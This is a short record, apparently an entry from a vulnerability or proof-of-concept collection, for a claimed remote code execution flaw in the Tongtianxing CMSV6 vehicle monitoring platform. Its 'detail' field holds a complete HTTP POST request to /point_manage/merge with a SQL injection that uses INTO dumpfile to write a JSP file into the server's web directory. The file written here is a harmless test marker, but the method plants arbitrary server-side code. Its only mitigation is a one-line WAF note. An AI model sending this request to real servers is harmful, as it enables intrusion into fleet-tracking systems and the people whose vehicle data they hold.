vendor = "通天星"
name = "通天星 CMSV6 车载定位监控平台 merge 远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/point_manage/merge"
detail = "POST /point_manage/merge HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0Content-Type: application/x-www-form-urlencoded id=1&name=1' UNION SELECT%0aNULL, 0x3c253d202268656c6c6f2220253e,NULL,NULL,NULL,NULL,NULL,NULL INTO dumpfile '../../tomcat/webapps/gpsweb/YNFHiRkD.jsp' FROMuser_sessiona WHERE '1 '='1 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_ti me=8"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
